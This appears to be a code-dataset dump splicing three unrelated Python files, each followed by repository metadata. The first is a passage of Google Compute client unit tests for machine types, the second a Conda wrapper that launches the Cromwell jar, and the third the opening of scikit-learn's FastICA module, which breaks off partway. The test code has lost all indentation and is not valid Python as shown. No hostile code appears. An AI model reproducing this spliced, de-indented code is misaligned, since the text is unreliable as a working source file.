response_value = Response()
response_value.status_code = 200
json_return_value = compute.MachineTypeAggregatedList.to_json(return_value)
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
client.aggregated_list(**mock_args)
# Establish that the underlying call was made with the expected
# request object values.
assert len(req.mock_calls) == 1
_, args, _ = req.mock_calls[0]
assert path_template.validate(
"%s/compute/v1/projects/{project}/aggregated/machineTypes"
% client.transport._host,
args[1],
)
def test_aggregated_list_rest_flattened_error(transport: str = "rest"):
client = MachineTypesClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.aggregated_list(
compute.AggregatedListMachineTypesRequest(), project="project_value",
)
def test_aggregated_list_rest_pager(transport: str = "rest"):
client = MachineTypesClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Mock the http request call within the method and fake a response.
with mock.patch.object(Session, "request") as req:
# TODO(kbandes): remove this mock unless there's a good reason for it.
# with mock.patch.object(path_template, 'transcode') as transcode:
# Set the response as a series of pages
response = (
compute.MachineTypeAggregatedList(
items={
"a": compute.MachineTypesScopedList(),
"b": compute.MachineTypesScopedList(),
"c": compute.MachineTypesScopedList(),
},
next_page_token="abc",
),
compute.MachineTypeAggregatedList(items={}, next_page_token="def",),
compute.MachineTypeAggregatedList(
items={"g": compute.MachineTypesScopedList(),}, next_page_token="ghi",
),
compute.MachineTypeAggregatedList(
items={
"h": compute.MachineTypesScopedList(),
"i": compute.MachineTypesScopedList(),
},
),
)
# Two responses for two calls
response = response + response
# Wrap the values into proper Response objs
response = tuple(compute.MachineTypeAggregatedList.to_json(x) for x in response)
return_values = tuple(Response() for i in response)
for return_val, response_val in zip(return_values, response):
return_val._content = response_val.encode("UTF-8")
return_val.status_code = 200
req.side_effect = return_values
sample_request = {"project": "sample1"}
pager = client.aggregated_list(request=sample_request)
assert isinstance(pager.get("a"), compute.MachineTypesScopedList)
assert pager.get("h") is None
results = list(pager)
assert len(results) == 6
assert all(isinstance(i, tuple) for i in results)
for result in results:
assert isinstance(result, tuple)
assert tuple(type(t) for t in result) == (
str,
compute.MachineTypesScopedList,
)
assert pager.get("a") is None
assert isinstance(pager.get("h"), compute.MachineTypesScopedList)
pages = list(client.aggregated_list(request=sample_request).pages)
for page_, token in zip(pages, ["abc", "def", "ghi", ""]):
assert page_.raw_page.next_page_token == token
@pytest.mark.parametrize("request_type", [compute.GetMachineTypeRequest, dict,])
def test_get_rest(request_type):
client = MachineTypesClient(
credentials=ga_credentials.AnonymousCredentials(), transport="rest",
)
# send a request that will satisfy transcoding
request_init = {"project": "sample1", "zone": "sample2", "machine_type": "sample3"}
request = request_type(request_init)
# Mock the http request call within the method and fake a response.
with mock.patch.object(type(client.transport._session), "request") as req:
# Designate an appropriate value for the returned response.
return_value = compute.MachineType(
creation_timestamp="creation_timestamp_value",
description="description_value",
guest_cpus=1090,
id=205,
image_space_gb=1430,
is_shared_cpu=True,
kind="kind_value",
maximum_persistent_disks=2603,
maximum_persistent_disks_size_gb=3437,
memory_mb=967,
name="name_value",
self_link="self_link_value",
zone="zone_value",
)
# Wrap the value into a proper Response obj
response_value = Response()
response_value.status_code = 200
json_return_value = compute.MachineType.to_json(return_value)
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
response = client.get(request)
# Establish that the response is the type that we expect.
assert isinstance(response, compute.MachineType)
assert response.creation_timestamp == "creation_timestamp_value"
assert response.description == "description_value"
assert response.guest_cpus == 1090
assert response.id == 205
assert response.image_space_gb == 1430
assert response.is_shared_cpu is True
assert response.kind == "kind_value"
assert response.maximum_persistent_disks == 2603
assert response.maximum_persistent_disks_size_gb == 3437
assert response.memory_mb == 967
assert response.name == "name_value"
assert response.self_link == "self_link_value"
assert response.zone == "zone_value"
def test_get_rest_required_fields(request_type=compute.GetMachineTypeRequest):
transport_class = transports.MachineTypesRestTransport
request_init = {}
request_init["machine_type"] = ""
request_init["project"] = ""
request_init["zone"] = ""
request = request_type(request_init)
jsonified_request = json.loads(
request_type.to_json(
request, including_default_value_fields=False, use_integers_for_enums=False
)
)
# verify fields with default values are dropped
unset_fields = transport_class(
credentials=ga_credentials.AnonymousCredentials()
).get._get_unset_required_fields(jsonified_request)
jsonified_request.update(unset_fields)
# verify required fields with default values are now present
jsonified_request["machineType"] = "machine_type_value"
jsonified_request["project"] = "project_value"
jsonified_request["zone"] = "zone_value"
unset_fields = transport_class(
credentials=ga_credentials.AnonymousCredentials()
).get._get_unset_required_fields(jsonified_request)
jsonified_request.update(unset_fields)
# verify required fields with non-default values are left alone
assert "machineType" in jsonified_request
assert jsonified_request["machineType"] == "machine_type_value"
assert "project" in jsonified_request
assert jsonified_request["project"] == "project_value"
assert "zone" in jsonified_request
assert jsonified_request["zone"] == "zone_value"
client = MachineTypesClient(
credentials=ga_credentials.AnonymousCredentials(), transport="rest",
)
request = request_type(request_init)
# Designate an appropriate value for the returned response.
return_value = compute.MachineType()
# Mock the http request call within the method and fake a response.
with mock.patch.object(Session, "request") as req:
# We need to mock transcode() because providing default values
# for required fields will fail the real version if the http_options
# expect actual values for those fields.
with mock.patch.object(path_template, "transcode") as transcode:
# A uri without fields and an empty body will force all the
# request fields to show up in the query_params.
transcode_result = {
"uri": "v1/sample_method",
"method": "get",
"query_params": request_init,
}
transcode.return_value = transcode_result
response_value = Response()
response_value.status_code = 200
json_return_value = compute.MachineType.to_json(return_value)
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
response = client.get(request)
expected_params = []
actual_params = req.call_args.kwargs["params"]
assert expected_params == actual_params
def test_get_rest_unset_required_fields():
transport = transports.MachineTypesRestTransport(
        credentials=ga_credentials.AnonymousCredentials()
)
unset_fields = transport.get._get_unset_required_fields({})
assert set(unset_fields) == (set(()) & set(("machineType", "project", "zone",)))
@pytest.mark.parametrize("null_interceptor", [True, False])
def test_get_rest_interceptors(null_interceptor):
transport = transports.MachineTypesRestTransport(
credentials=ga_credentials.AnonymousCredentials(),
interceptor=None
if null_interceptor
else transports.MachineTypesRestInterceptor(),
)
client = MachineTypesClient(transport=transport)
with mock.patch.object(
type(client.transport._session), "request"
) as req, mock.patch.object(
path_template, "transcode"
) as transcode, mock.patch.object(
transports.MachineTypesRestInterceptor, "post_get"
) as post, mock.patch.object(
transports.MachineTypesRestInterceptor, "pre_get"
) as pre:
pre.assert_not_called()
post.assert_not_called()
transcode.return_value = {
"method": "post",
"uri": "my_uri",
"body": None,
"query_params": {},
}
req.return_value = Response()
req.return_value.status_code = 200
req.return_value.request = PreparedRequest()
req.return_value._content = compute.MachineType.to_json(compute.MachineType())
request = compute.GetMachineTypeRequest()
metadata = [
("key", "val"),
("cephalopod", "squid"),
]
pre.return_value = request, metadata
post.return_value = compute.MachineType
client.get(request, metadata=[("key", "val"), ("cephalopod", "squid"),])
pre.assert_called_once()
post.assert_called_once()
def test_get_rest_bad_request(
transport: str = "rest", request_type=compute.GetMachineTypeRequest
):
client = MachineTypesClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# send a request that will satisfy transcoding
request_init = {"project": "sample1", "zone": "sample2", "machine_type": "sample3"}
request = request_type(request_init)
# Mock the http request call within the method and fake a BadRequest error.
with mock.patch.object(Session, "request") as req, pytest.raises(
core_exceptions.BadRequest
):
# Wrap the value into a proper Response obj
response_value = Response()
response_value.status_code = 400
response_value.request = Request()
req.return_value = response_value
client.get(request)
def test_get_rest_flattened():
client = MachineTypesClient(
credentials=ga_credentials.AnonymousCredentials(), transport="rest",
)
# Mock the http request call within the method and fake a response.
with mock.patch.object(type(client.transport._session), "request") as req:
# Designate an appropriate value for the returned response.
return_value = compute.MachineType()
# get arguments that satisfy an http rule for this method
sample_request = {
"project": "sample1",
"zone": "sample2",
"machine_type": "sample3",
}
# get truthy value for each flattened field
mock_args = dict(
project="project_value",
zone="zone_value",
machine_type="machine_type_value",
)
mock_args.update(sample_request)
# Wrap the value into a proper Response obj
response_value = Response()
response_value.status_code = 200
json_return_value = compute.MachineType.to_json(return_value)
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
client.get(**mock_args)
# Establish that the underlying call was made with the expected
# request object values.
assert len(req.mock_calls) == 1
_, args, _ = req.mock_calls[0]
assert path_template.validate(
"%s/compute/v1/projects/{project}/zones/{zone}/machineTypes/{machine_type}"
% client.transport._host,
args[1],
)
def test_get_rest_flattened_error(transport: str = "rest"):
client = MachineTypesClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.get(
compute.GetMachineTypeRequest(),
project="project_value",
zone="zone_value",
machine_type="machine_type_value",
)
def test_get_rest_error():
client = MachineTypesClient(
credentials=ga_credentials.AnonymousCredentials(), transport="rest"
)
@pytest.mark.parametrize("request_type", [compute.ListMachineTypesRequest, dict,])
def test_list_rest(request_type):
client = MachineTypesClient(
credentials=ga_credentials.AnonymousCredentials(), transport="rest",
)
# send a request that will satisfy transcoding
request_init = {"project": "sample1", "zone": "sample2"}
request = request_type(request_init)
# Mock the http request call within the method and fake a response.
with mock.patch.object(type(client.transport._session), "request") as req:
# Designate an appropriate value for the returned response.
return_value = compute.MachineTypeList(
id="id_value",
kind="kind_value",
next_page_token="next_page_token_value",
self_link="self_link_value",
)
# Wrap the value into a proper Response obj
response_value = Response()
response_value.status_code = 200
json_return_value = compute.MachineTypeList.to_json(return_value)
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
response = client.list(request)
# Establish that the response is the type that we expect.
assert isinstance(response, pagers.ListPager)
assert response.id == "id_value"
assert response.kind == "kind_value"
assert response.next_page_token == "next_page_token_value"
assert response.self_link == "self_link_value"
def test_list_rest_required_fields(request_type=compute.ListMachineTypesRequest):
transport_class = transports.MachineTypesRestTransport
request_init = {}
request_init["project"] = ""
request_init["zone"] = ""
request = request_type(request_init)
jsonified_request = json.loads(
request_type.to_json(
request, including_default_value_fields=False, use_integers_for_enums=False
)
)
# verify fields with default values are dropped
unset_fields = transport_class(
credentials=ga_credentials.AnonymousCredentials()
).list._get_unset_required_fields(jsonified_request)
jsonified_request.update(unset_fields)
# verify required fields with default values are now present
jsonified_request["project"] = "project_value"
jsonified_request["zone"] = "zone_value"
unset_fields = transport_class(
credentials=ga_credentials.AnonymousCredentials()
).list._get_unset_required_fields(jsonified_request)
# Check that path parameters and body parameters are not mixing in.
assert not set(unset_fields) - set(
("filter", "max_results", "order_by", "page_token", "return_partial_success",)
)
jsonified_request.update(unset_fields)
# verify required fields with non-default values are left alone
assert "project" in jsonified_request
assert jsonified_request["project"] == "project_value"
assert "zone" in jsonified_request
assert jsonified_request["zone"] == "zone_value"
client = MachineTypesClient(
credentials=ga_credentials.AnonymousCredentials(), transport="rest",
)
request = request_type(request_init)
# Designate an appropriate value for the returned response.
return_value = compute.MachineTypeList()
# Mock the http request call within the method and fake a response.
with mock.patch.object(Session, "request") as req:
# We need to mock transcode() because providing default values
# for required fields will fail the real version if the http_options
# expect actual values for those fields.
with mock.patch.object(path_template, "transcode") as transcode:
# A uri without fields and an empty body will force all the
# request fields to show up in the query_params.
transcode_result = {
"uri": "v1/sample_method",
"method": "get",
"query_params": request_init,
}
transcode.return_value = transcode_result
response_value = Response()
response_value.status_code = 200
json_return_value = compute.MachineTypeList.to_json(return_value)
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
response = client.list(request)
expected_params = []
actual_params = req.call_args.kwargs["params"]
assert expected_params == actual_params
def test_list_rest_unset_required_fields():
transport = transports.MachineTypesRestTransport(
        credentials=ga_credentials.AnonymousCredentials()
)
unset_fields = transport.list._get_unset_required_fields({})
assert set(unset_fields) == (
set(("filter", "maxResults", "orderBy", "pageToken", "returnPartialSuccess",))
& set(("project", "zone",))
)
@pytest.mark.parametrize("null_interceptor", [True, False])
def test_list_rest_interceptors(null_interceptor):
transport = transports.MachineTypesRestTransport(
credentials=ga_credentials.AnonymousCredentials(),
interceptor=None
if null_interceptor
else transports.MachineTypesRestInterceptor(),
)
client = MachineTypesClient(transport=transport)
with mock.patch.object(
type(client.transport._session), "request"
) as req, mock.patch.object(
path_template, "transcode"
) as transcode, mock.patch.object(
transports.MachineTypesRestInterceptor, "post_list"
) as post, mock.patch.object(
transports.MachineTypesRestInterceptor, "pre_list"
) as pre:
pre.assert_not_called()
post.assert_not_called()
transcode.return_value = {
"method": "post",
"uri": "my_uri",
"body": None,
"query_params": {},
}
req.return_value = Response()
req.return_value.status_code = 200
req.return_value.request = PreparedRequest()
req.return_value._content = compute.MachineTypeList.to_json(
compute.MachineTypeList()
)
request = compute.ListMachineTypesRequest()
metadata = [
("key", "val"),
("cephalopod", "squid"),
]
pre.return_value = request, metadata
post.return_value = compute.MachineTypeList
client.list(request, metadata=[("key", "val"), ("cephalopod", "squid"),])
pre.assert_called_once()
post.assert_called_once()
def test_list_rest_bad_request(
transport: str = "rest", request_type=compute.ListMachineTypesRequest
):
client = MachineTypesClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# send a request that will satisfy transcoding
request_init = {"project": "sample1", "zone": "sample2"}
request = request_type(request_init)
# Mock the http request call within the method and fake a BadRequest error.
with mock.patch.object(Session, "request") as req, pytest.raises(
core_exceptions.BadRequest
):
# Wrap the value into a proper Response obj
response_value = Response()
response_value.status_code = 400
response_value.request = Request()
req.return_value = response_value
client.list(request)
def test_list_rest_flattened():
client = MachineTypesClient(
credentials=ga_credentials.AnonymousCredentials(), transport="rest",
)
# Mock the http request call within the method and fake a response.
with mock.patch.object(type(client.transport._session), "request") as req:
# Designate an appropriate value for the returned response.
return_value = compute.MachineTypeList()
# get arguments that satisfy an http rule for this method
sample_request = {"project": "sample1", "zone": "sample2"}
# get truthy value for each flattened field
mock_args = dict(project="project_value", zone="zone_value",)
mock_args.update(sample_request)
# Wrap the value into a proper Response obj
response_value = Response()
response_value.status_code = 200
json_return_value = compute.MachineTypeList.to_json(return_value)
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
client.list(**mock_args)
# Establish that the underlying call was made with the expected
# request object values.
assert len(req.mock_calls) == 1
_, args, _ = req.mock_calls[0]
assert path_template.validate(
"%s/compute/v1/projects/{project}/zones/{zone}/machineTypes"
% client.transport._host,
args[1],
)
def test_list_rest_flattened_error(transport: str = "rest"):
client = MachineTypesClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.list(
compute.ListMachineTypesRequest(),
project="project_value",
zone="zone_value",
)
def test_list_rest_pager(transport: str = "rest"):
client = MachineTypesClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Mock the http request call within the method and fake a response.
with mock.patch.object(Session, "request") as req:
# TODO(kbandes): remove this mock unless there's a good reason for it.
# with mock.patch.object(path_template, 'transcode') as transcode:
# Set the response as a series of pages
response = (
compute.MachineTypeList(
items=[
compute.MachineType(),
compute.MachineType(),
compute.MachineType(),
],
next_page_token="abc",
),
compute.MachineTypeList(items=[], next_page_token="def",),
compute.MachineTypeList(
items=[compute.MachineType(),], next_page_token="ghi",
),
compute.MachineTypeList(
items=[compute.MachineType(), compute.MachineType(),],
),
)
# Two responses for two calls
response = response + response
# Wrap the values into proper Response objs
response = tuple(compute.MachineTypeList.to_json(x) for x in response)
return_values = tuple(Response() for i in response)
for return_val, response_val in zip(return_values, response):
return_val._content = response_val.encode("UTF-8")
return_val.status_code = 200
req.side_effect = return_values
sample_request = {"project": "sample1", "zone": "sample2"}
pager = client.list(request=sample_request)
results = list(pager)
assert len(results) == 6
assert all(isinstance(i, compute.MachineType) for i in results)
pages = list(client.list(request=sample_request).pages)
for page_, token in zip(pages, ["abc", "def", "ghi", ""]):
assert page_.raw_page.next_page_token == token
def test_credentials_transport_error():
# It is an error to provide credentials and a transport instance.
transport = transports.MachineTypesRestTransport(
credentials=ga_credentials.AnonymousCredentials(),
)
with pytest.raises(ValueError):
client = MachineTypesClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# It is an error to provide a credentials file and a transport instance.
transport = transports.MachineTypesRestTransport(
credentials=ga_credentials.AnonymousCredentials(),
)
with pytest.raises(ValueError):
client = MachineTypesClient(
client_options={"credentials_file": "credentials.json"},
transport=transport,
)
# It is an error to provide an api_key and a transport instance.
transport = transports.MachineTypesRestTransport(
credentials=ga_credentials.AnonymousCredentials(),
)
options = client_options.ClientOptions()
options.api_key = "api_key"
with pytest.raises(ValueError):
client = MachineTypesClient(client_options=options, transport=transport,)
# It is an error to provide an api_key and a credential.
options = mock.Mock()
options.api_key = "api_key"
with pytest.raises(ValueError):
client = MachineTypesClient(
client_options=options, credentials=ga_credentials.AnonymousCredentials()
)
# It is an error to provide scopes and a transport instance.
transport = transports.MachineTypesRestTransport(
credentials=ga_credentials.AnonymousCredentials(),
)
with pytest.raises(ValueError):
client = MachineTypesClient(
client_options={"scopes": ["1", "2"]}, transport=transport,
)
def test_transport_instance():
# A client may be instantiated with a custom transport instance.
transport = transports.MachineTypesRestTransport(
credentials=ga_credentials.AnonymousCredentials(),
)
client = MachineTypesClient(transport=transport)
assert client.transport is transport
@pytest.mark.parametrize("transport_class", [transports.MachineTypesRestTransport,])
def test_transport_adc(transport_class):
# Test default credentials are used if not provided.
with mock.patch.object(google.auth, "default") as adc:
adc.return_value = (ga_credentials.AnonymousCredentials(), None)
transport_class()
adc.assert_called_once()
def test_machine_types_base_transport_error():
# Passing both a credentials object and credentials_file should raise an error
with pytest.raises(core_exceptions.DuplicateCredentialArgs):
transport = transports.MachineTypesTransport(
credentials=ga_credentials.AnonymousCredentials(),
credentials_file="credentials.json",
)
def test_machine_types_base_transport():
# Instantiate the base transport.
with mock.patch(
"google.cloud.compute_v1.services.machine_types.transports.MachineTypesTransport.__init__"
) as Transport:
Transport.return_value = None
transport = transports.MachineTypesTransport(
credentials=ga_credentials.AnonymousCredentials(),
)
# Every method on the transport should just blindly
# raise NotImplementedError.
methods = (
"aggregated_list",
"get",
"list",
)
for method in methods:
with pytest.raises(NotImplementedError):
getattr(transport, method)(request=object())
with pytest.raises(NotImplementedError):
transport.close()
def test_machine_types_base_transport_with_credentials_file():
# Instantiate the base transport with a credentials file
with mock.patch.object(
google.auth, "load_credentials_from_file", autospec=True
) as load_creds, mock.patch(
"google.cloud.compute_v1.services.machine_types.transports.MachineTypesTransport._prep_wrapped_messages"
) as Transport:
Transport.return_value = None
load_creds.return_value = (ga_credentials.AnonymousCredentials(), None)
transport = transports.MachineTypesTransport(
credentials_file="credentials.json", quota_project_id="octopus",
)
load_creds.assert_called_once_with(
"credentials.json",
scopes=None,
default_scopes=(
"https://www.googleapis.com/auth/compute.readonly",
"https://www.googleapis.com/auth/compute",
"https://www.googleapis.com/auth/cloud-platform",
),
quota_project_id="octopus",
)
def test_machine_types_base_transport_with_adc():
# Test the default credentials are used if credentials and credentials_file are None.
with mock.patch.object(google.auth, "default", autospec=True) as adc, mock.patch(
"google.cloud.compute_v1.services.machine_types.transports.MachineTypesTransport._prep_wrapped_messages"
) as Transport:
Transport.return_value = None
adc.return_value = (ga_credentials.AnonymousCredentials(), None)
transport = transports.MachineTypesTransport()
adc.assert_called_once()
def test_machine_types_auth_adc():
# If no credentials are provided, we should use ADC credentials.
with mock.patch.object(google.auth, "default", autospec=True) as adc:
adc.return_value = (ga_credentials.AnonymousCredentials(), None)
MachineTypesClient()
adc.assert_called_once_with(
scopes=None,
default_scopes=(
"https://www.googleapis.com/auth/compute.readonly",
"https://www.googleapis.com/auth/compute",
"https://www.googleapis.com/auth/cloud-platform",
),
quota_project_id=None,
)
def test_machine_types_http_transport_client_cert_source_for_mtls():
cred = ga_credentials.AnonymousCredentials()
with mock.patch(
"google.auth.transport.requests.AuthorizedSession.configure_mtls_channel"
) as mock_configure_mtls_channel:
transports.MachineTypesRestTransport(
credentials=cred, client_cert_source_for_mtls=client_cert_source_callback
)
mock_configure_mtls_channel.assert_called_once_with(client_cert_source_callback)
@pytest.mark.parametrize("transport_name", ["rest",])
def test_machine_types_host_no_port(transport_name):
client = MachineTypesClient(
credentials=ga_credentials.AnonymousCredentials(),
client_options=client_options.ClientOptions(
api_endpoint="compute.googleapis.com"
),
transport=transport_name,
)
assert client.transport._host == (
"compute.googleapis.com:443"
if transport_name in ["grpc", "grpc_asyncio"]
else "https://compute.googleapis.com"
)
@pytest.mark.parametrize("transport_name", ["rest",])
def test_machine_types_host_with_port(transport_name):
client = MachineTypesClient(
credentials=ga_credentials.AnonymousCredentials(),
client_options=client_options.ClientOptions(
api_endpoint="compute.googleapis.com:8000"
),
transport=transport_name,
)
assert client.transport._host == (
"compute.googleapis.com:8000"
if transport_name in ["grpc", "grpc_asyncio"]
else "https://compute.googleapis.com:8000"
)
def test_common_billing_account_path():
billing_account = "squid"
expected = "billingAccounts/{billing_account}".format(
billing_account=billing_account,
)
actual = MachineTypesClient.common_billing_account_path(billing_account)
assert expected == actual
def test_parse_common_billing_account_path():
expected = {
"billing_account": "clam",
}
path = MachineTypesClient.common_billing_account_path(**expected)
# Check that the path construction is reversible.
actual = MachineTypesClient.parse_common_billing_account_path(path)
assert expected == actual
def test_common_folder_path():
folder = "whelk"
expected = "folders/{folder}".format(folder=folder,)
actual = MachineTypesClient.common_folder_path(folder)
assert expected == actual
def test_parse_common_folder_path():
expected = {
"folder": "octopus",
}
path = MachineTypesClient.common_folder_path(**expected)
# Check that the path construction is reversible.
actual = MachineTypesClient.parse_common_folder_path(path)
assert expected == actual
def test_common_organization_path():
organization = "oyster"
expected = "organizations/{organization}".format(organization=organization,)
actual = MachineTypesClient.common_organization_path(organization)
assert expected == actual
def test_parse_common_organization_path():
expected = {
"organization": "nudibranch",
}
path = MachineTypesClient.common_organization_path(**expected)
# Check that the path construction is reversible.
actual = MachineTypesClient.parse_common_organization_path(path)
assert expected == actual
def test_common_project_path():
project = "cuttlefish"
expected = "projects/{project}".format(project=project,)
actual = MachineTypesClient.common_project_path(project)
assert expected == actual
def test_parse_common_project_path():
expected = {
"project": "mussel",
}
path = MachineTypesClient.common_project_path(**expected)
# Check that the path construction is reversible.
actual = MachineTypesClient.parse_common_project_path(path)
assert expected == actual
def test_common_location_path():
project = "winkle"
location = "nautilus"
expected = "projects/{project}/locations/{location}".format(
project=project, location=location,
)
actual = MachineTypesClient.common_location_path(project, location)
assert expected == actual
def test_parse_common_location_path():
expected = {
"project": "scallop",
"location": "abalone",
}
path = MachineTypesClient.common_location_path(**expected)
# Check that the path construction is reversible.
actual = MachineTypesClient.parse_common_location_path(path)
assert expected == actual
def test_client_with_default_client_info():
client_info = gapic_v1.client_info.ClientInfo()
with mock.patch.object(
transports.MachineTypesTransport, "_prep_wrapped_messages"
) as prep:
client = MachineTypesClient(
credentials=ga_credentials.AnonymousCredentials(), client_info=client_info,
)
prep.assert_called_once_with(client_info)
with mock.patch.object(
transports.MachineTypesTransport, "_prep_wrapped_messages"
) as prep:
transport_class = MachineTypesClient.get_transport_class()
transport = transport_class(
credentials=ga_credentials.AnonymousCredentials(), client_info=client_info,
)
prep.assert_called_once_with(client_info)
def test_transport_close():
transports = {
"rest": "_session",
}
for transport, close_name in transports.items():
client = MachineTypesClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport
)
with mock.patch.object(
type(getattr(client.transport, close_name)), "close"
) as close:
with client:
close.assert_not_called()
close.assert_called_once()
def test_client_ctx():
transports = [
"rest",
]
for transport in transports:
client = MachineTypesClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport
)
# Test client calls underlying transport.
with mock.patch.object(type(client.transport), "close") as close:
close.assert_not_called()
with client:
pass
close.assert_called()
@pytest.mark.parametrize(
"client_class,transport_class",
[(MachineTypesClient, transports.MachineTypesRestTransport),],
)
def test_api_key_credentials(client_class, transport_class):
with mock.patch.object(
google.auth._default, "get_api_key_credentials", create=True
) as get_api_key_credentials:
mock_cred = mock.Mock()
get_api_key_credentials.return_value = mock_cred
options = client_options.ClientOptions()
options.api_key = "api_key"
with mock.patch.object(transport_class, "__init__") as patched:
patched.return_value = None
client = client_class(client_options=options)
patched.assert_called_once_with(
credentials=mock_cred,
credentials_file=None,
host=client.DEFAULT_ENDPOINT,
scopes=None,
client_cert_source_for_mtls=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
always_use_jwt_access=True,
)
|
googleapis/python-compute
|
tests/unit/gapic/compute_v1/test_machine_types.py
|
Python
|
apache-2.0
| 67,348
|
[
"Octopus"
] |
b1dd81bcfe781e1e4a2caf391fff3d4e0773a7c4fcd255fad306a982d34cb9a2
|
#!/usr/bin/env python
#
# Wrapper script for invoking the jar.
#
# This script is written for use with the Conda package manager and is ported
# from a bash script that does the same thing, adapting the style in
# the peptide-shaker wrapper
# (https://github.com/bioconda/bioconda-recipes/blob/master/recipes/peptide-shaker/peptide-shaker.py)
import subprocess
import sys
from os import access, getenv, path, X_OK
# Expected name of the Cromwell JAR file.
JAR_NAME = 'cromwell.jar'
# Default options passed to the `java` executable.
DEFAULT_JVM_MEM_OPTS = ['-Xms512m', '-Xmx1g']
def real_dirname(in_path):
"""Returns the symlink-resolved, canonicalized directory-portion of
the given path."""
return path.dirname(path.realpath(in_path))
def java_executable():
"""Returns the name of the Java executable."""
java_home = getenv('JAVA_HOME')
java_bin = path.join('bin', 'java')
if java_home and access(path.join(java_home, java_bin), X_OK):
return path.join(java_home, java_bin)
return 'java'
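# Behavior sketch (paths are hypothetical): with JAVA_HOME=/opt/jdk and an
# executable /opt/jdk/bin/java present, java_executable() returns
# '/opt/jdk/bin/java'; otherwise it falls back to plain 'java' and relies on
# the PATH lookup done by subprocess.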
def jvm_opts(argv, default_mem_opts=DEFAULT_JVM_MEM_OPTS):
"""Constructs a list of Java arguments based on our argument list.
The argument list passed in argv must not include the script name.
    The return value is a 3-tuple of lists of strings, of the form:
    (memory_options, prop_options, passthrough_options)
"""
mem_opts, prop_opts, pass_args = [], [], []
for arg in argv:
if arg.startswith('-D') or arg.startswith('-XX'):
opts_list = prop_opts
elif arg.startswith('-Xm'):
opts_list = mem_opts
else:
opts_list = pass_args
opts_list.append(arg)
if mem_opts == [] and getenv('_JAVA_OPTIONS') is None:
mem_opts = default_mem_opts
return (mem_opts, prop_opts, pass_args)
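# Illustrative split (arguments are made up for the example):
#
#   jvm_opts(['-Xmx4g', '-Dlog.level=DEBUG', 'run', 'wf.wdl'])
#   # -> (['-Xmx4g'], ['-Dlog.level=DEBUG'], ['run', 'wf.wdl'])
#
# When no -Xm* flag is given and _JAVA_OPTIONS is unset,
# DEFAULT_JVM_MEM_OPTS is substituted for the memory options.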
def main():
java = java_executable()
jar_dir = real_dirname(sys.argv[0])
(mem_opts, prop_opts, pass_args) = jvm_opts(sys.argv[1:])
    # If the first passthrough argument looks like a fully qualified class
    # name (an 'org.'-prefixed package path), run it from the classpath
    # instead of the jar's default main class.
    if pass_args != [] and pass_args[0].startswith('org'):
        jar_arg = '-cp'
    else:
        jar_arg = '-jar'
jar_path = path.join(jar_dir, JAR_NAME)
java_args = [java] + mem_opts + prop_opts + [jar_arg] + [jar_path] + pass_args
sys.exit(subprocess.call(java_args))
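# Invocation sketch (the workflow name is hypothetical; Conda installs this
# wrapper on PATH as 'cromwell'):
#
#   cromwell -Xmx8g run hello.wdl
#   # runs: java -Xmx8g -jar <jar_dir>/cromwell.jar run hello.wdl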
if __name__ == "__main__":
main()
|
ThomasWollmann/bioconda-recipes
|
recipes/cromwell/cromwell.py
|
Python
|
mit
| 2,298
|
[
"Bioconda"
] |
9f11e14a9c79ba170939e74cf5d0927a0609bcb62f285c7ddd919397dd5c240e
|
"""
Python implementation of the fast ICA algorithms.
Reference: Tables 8.3 and 8.4 page 196 in the book:
Independent Component Analysis, by Hyvarinen et al.
"""
# Author: Pierre Lafaye de Micheaux, Stefan van der Walt, Gael Varoquaux,
# Bertrand Thirion, Alexandre Gramfort
# License: BSD 3 clause
import warnings
import numpy as np
from scipy import linalg
from ..base import BaseEstimator, TransformerMixin
from ..utils import array2d, as_float_array, check_random_state
__all__ = ['fastica', 'FastICA']
def _gs_decorrelation(w, W, j):
"""
Orthonormalize w wrt the first j rows of W
Parameters
----------
    w : array of shape (n,)
        Vector to be orthogonalized (modified in place).
    W : array of shape (p, n)
        Null space definition.
    j : int < p
        Orthogonalize against the first j rows of W.
    Caveats
    -------
    Assumes that W is orthogonal.
"""
w -= np.dot(np.dot(w, W[:j].T), W[:j])
return w
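# Worked illustration (a sketch, not part of the library): with W the
# identity, orthogonalizing against its first two rows zeroes the first two
# coordinates of w.
#
#   w = np.array([1.0, 2.0, 3.0])
#   _gs_decorrelation(w, np.eye(3), 2)   # w is now array([0., 0., 3.])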
def _sym_decorrelation(W):
""" Symmetric decorrelation
i.e. W <- (W * W.T) ^{-1/2} * W
"""
K = np.dot(W, W.T)
s, u = linalg.eigh(K)
# u (resp. s) contains the eigenvectors (resp. square roots of
# the eigenvalues) of W * W.T
W = np.dot(np.dot(np.dot(u, np.diag(1.0 / np.sqrt(s))), u.T), W)
return W
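# Sanity sketch (assumes W is square and non-singular): the decorrelated
# matrix has orthonormal rows, i.e. np.dot(W_new, W_new.T) is the identity.
#
#   rng = np.random.RandomState(0)
#   W_new = _sym_decorrelation(rng.randn(3, 3))
#   np.allclose(np.dot(W_new, W_new.T), np.eye(3))   # -> True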
def _ica_def(X, tol, g, gprime, fun_args, max_iter, w_init):
"""Deflationary FastICA using fun approx to neg-entropy function
Used internally by FastICA.
"""
n_components = w_init.shape[0]
W = np.zeros((n_components, n_components), dtype=float)
# j is the index of the extracted component
for j in range(n_components):
w = w_init[j, :].copy()
w /= np.sqrt((w ** 2).sum())
n_iterations = 0
